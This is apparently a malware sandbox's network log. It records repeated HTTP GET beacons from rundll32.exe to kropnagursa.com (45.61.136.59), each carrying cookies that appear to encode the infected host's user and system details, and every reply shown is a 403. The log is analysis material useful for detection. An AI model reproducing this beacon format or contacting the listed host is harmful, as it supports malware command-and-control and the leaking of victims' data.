                                                                                                                                            Feb 2, 2023 21:17:40.398124933 CET2194OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:40.565676928 CET2194INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:40 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            68192.168.2.44976445.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:41.025835991 CET2195OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:41.193419933 CET2196INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:41 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            69192.168.2.44976545.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:41.515268087 CET2196OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:41.679944992 CET2197INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:41 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            7192.168.2.44970345.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:01.267112017 CET2117OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:01.433665037 CET2117INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:01 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            70192.168.2.44976645.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:41.981431007 CET2198OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:42.146136999 CET2198INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:42 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            71192.168.2.44976745.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:42.465960979 CET2199OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:42.630477905 CET2199INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:42 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            72192.168.2.44976845.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:42.943598986 CET2200OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:43.110816956 CET2201INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:43 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            73192.168.2.44976945.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:43.443830967 CET2202OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:43.608535051 CET2202INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:43 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            74192.168.2.44977045.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:43.926925898 CET2203OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:44.091758013 CET2203INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:43 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            75192.168.2.44977145.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:44.582052946 CET2204OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:44.749151945 CET2204INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:44 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            76192.168.2.44977245.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:45.080285072 CET2205OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:45.245088100 CET2206INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:45 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            77192.168.2.44977345.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:45.561255932 CET2207OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:45.726116896 CET2207INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:45 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                            Feb 2, 2023 21:17:45.857362032 CET2207OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:46.022758961 CET2208INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:45 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            78192.168.2.44977445.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:46.334724903 CET2209OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:46.499655008 CET2209INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:46 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            79192.168.2.44977545.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:46.812813997 CET2210OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:46.977704048 CET2210INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:46 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            8192.168.2.44970445.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:01.885380030 CET2118OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:02.050287008 CET2118INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:01 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


